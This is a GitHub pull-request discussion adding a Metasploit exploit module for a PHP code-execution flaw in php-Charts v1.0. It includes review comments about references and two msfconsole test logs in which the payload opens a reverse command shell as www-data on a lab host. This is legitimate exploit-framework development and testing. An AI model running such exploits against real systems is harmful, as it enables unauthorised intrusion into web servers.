Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add php-Charts v1.0 PHP Code Execution Exploit #1341

Merged
merged 3 commits into from Jan 20, 2013

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Jan 20, 2013

Add php-Charts v1.0 PHP Code Execution Vulnerability exploit module

],
'References' =>
[
['URL', 'http://www.exploit-db.com/exploits/24201/'],
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 Jan 20, 2013

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It's an EDB reference, not URL

Copy link
Contributor

@jvazquez-r7 jvazquez-r7 Jan 20, 2013

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

There is also OSVDB reference for this vulnerability: http://www.osvdb.org/show/osvdb/89334 , could you please add the reference?

@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Jan 20, 2013

Tested successfully:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > check
[*] 192.168.1.154:80 - Sending check
[+] The target is vulnerable.
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sQkJsNt3VTXIrM6l;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sQkJsNt3VTXIrM6l\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46786) at 2013-01-20 17:11:45 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Once comments are fixed I think we'll be ready to merge it :-)

@jvazquez-r7 jvazquez-r7 merged commit dc318c5 into rapid7:master Jan 20, 2013
@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Jan 20, 2013

Thanks,

Test after changes:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > exploit
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[*] Accepted the first client connection...
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the second client connection...
[*] Command: echo D0GYAZBZleRafqnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "D0GYAZBZleRafqnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46790) at 2013-01-20 17:36:30 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Merged after updating references and disclosure date!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants